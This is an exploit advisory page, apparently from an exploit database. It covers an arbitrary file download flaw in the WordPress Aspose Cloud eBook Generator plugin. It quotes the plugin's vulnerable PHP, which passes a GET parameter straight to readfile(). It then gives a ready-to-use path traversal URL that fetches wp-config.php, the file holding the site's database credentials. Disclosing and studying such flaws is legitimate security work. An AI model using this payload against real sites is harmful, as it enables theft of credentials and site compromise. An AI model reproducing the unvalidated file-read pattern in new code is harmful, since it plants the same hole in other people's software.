WordPress Aspose Cloud eBook Generator File Download Vulnerability



EKU-ID: 4703 CVE: OSVDB-ID:
Author: ACC3SS Published: 2015-03-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
  |-------------------------------------------------------------------------|
  | [+] Exploit Title:Wordpress Aspose-Cloud-eBook-Generator Plugin  
Arbitrary File Download Vulnerability |
  | [+] Exploit Author: Ashiyane Digital Security Team |
  | [+] Vendor Homepage :  
https://wordpress.org/plugins/aspose-cloud-ebook-generator/
  | [+] Download Link :  
https://downloads.wordpress.org/plugin/aspose-cloud-ebook-generator.zip
  | [+] Tested on: Windows,Linux |
  | [+] Discovered By : ACC3SS
  |-------------------------------------------------------------------------|
  | [+] Exploit: |
  | [+] Vulnerable file :  
http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php  
|
  | [+] Vulnerable Code :
  
<?php
  
$file = $_GET['file'];
  
$file_arr = explode('/',$file);
  
$file_name = $file_arr[count($file_arr) - 1];
  
header ("Content-type: octet/stream");
  
header ("Content-disposition: attachment; filename=".$file_name.";");
  
header("Content-Length: ".filesize($file));
  
readfile($file);
  
exit;
  
?>
  
  | [+]  
http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=[File  
Address]
  | [+]
  | [+] Examples :  
http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
  |-------------------------------------------------------------------------|
  |*||*||*||*||*||*||*||*||*||*||*||*||*